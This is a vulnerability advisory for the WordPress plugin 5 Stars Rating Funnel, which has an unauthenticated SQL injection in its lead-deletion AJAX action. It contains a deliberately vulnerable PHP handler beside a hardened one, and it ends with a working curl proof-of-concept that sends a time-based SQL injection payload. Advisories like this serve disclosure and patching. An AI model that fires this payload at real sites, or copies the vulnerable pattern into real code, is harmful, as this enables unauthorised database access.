WPVDB-ID: E7FE8218-4EF5-4EF9-9850-8567C207E8E6
History: Mar 29, 2022 - 12:00 a.m.

5 Stars Rating Funnel < 1.2.53 - Unauthenticated SQLi

2022-03-29 00:00:00
cydave
wpscan.com
10
5 stars rating funnel
unauthenticated sqli
sql injection
ajax action
input sanitization
wordpress plugin

EPSS

0.002

Percentile

57.6%

The plugin does not properly sanitise, validate and escape lead IDs before using them in a SQL statement via the rrtngg_delete_leads AJAX action, which is available to unauthenticated users, leading to an unauthenticated SQL injection issue. There is an attempt to sanitise the input using sanitize_text_field(), however that function is not intended to prevent SQL injection.
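To make the sanitisation point concrete, the following is an added illustration written for this page, not the plugin's actual code: the table name, nonce action and function names are assumptions, while the action name rrtngg_delete_leads and the lead_ids parameter come from the advisory above. It places the weak pattern (sanitize_text_field() followed by string concatenation) beside a hardened handler that coerces IDs to integers, binds them with $wpdb->prepare(), and is no longer exposed to unauthenticated users.

```php
<?php
// Added illustration, not the plugin's code. Table name, nonce action and the
// function names are assumptions; only the AJAX action name and the lead_ids
// parameter come from the advisory.

// Weak pattern: sanitize_text_field() strips tags, line breaks and percent-encoded
// sequences, but leaves quotes, parentheses and SQL keywords intact, so a value
// such as "(SELECT SLEEP(5))" survives and is concatenated straight into the query.
function rrtngg_delete_leads_weak() {
    global $wpdb;
    $ids = array_map( 'sanitize_text_field', (array) ( $_POST['lead_ids'] ?? array() ) );
    $in  = implode( ',', $ids );
    $wpdb->query( "DELETE FROM {$wpdb->prefix}rrtngg_leads WHERE id IN ({$in})" ); // assumed table
    wp_send_json_success();
}
// The advisory says the action is reachable without authentication; in WordPress
// that means it was hooked via wp_ajax_nopriv_rrtngg_delete_leads as well.

// Hardened pattern: require a logged-in, capable user with a valid nonce,
// coerce every id to a non-negative integer, and bind them as %d placeholders.
function rrtngg_delete_leads_hardened() {
    global $wpdb;
    check_ajax_referer( 'rrtngg_delete_leads_nonce', 'nonce' ); // assumed nonce action name
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    // absint() turns any non-numeric payload into 0; array_filter() then drops it.
    $ids = array_values( array_filter( array_map( 'absint', (array) ( $_POST['lead_ids'] ?? array() ) ) ) );
    if ( empty( $ids ) ) {
        wp_send_json_error( 'no valid ids', 400 );
    }
    $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );
    $sql = $wpdb->prepare(
        "DELETE FROM {$wpdb->prefix}rrtngg_leads WHERE id IN ({$placeholders})", // assumed table
        $ids
    );
    $wpdb->query( $sql );
    wp_send_json_success();
}
// Only the authenticated hook is registered; no wp_ajax_nopriv_ variant exists.
add_action( 'wp_ajax_rrtngg_delete_leads', 'rrtngg_delete_leads_hardened' );
```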

PoC

1. Create a new funnel (All Rating Funnels sub-menu).
2. Create a new lead (Leads / Feedbacks sub-menu).
3. Invoke the following curl command to trigger a 5 second sleep:

curl https://example.com/wp-admin/admin-ajax.php --data 'action=rrtngg_delete_leads&lead_ids[]=(SELECT SLEEP(5))) AND 1=1 #'

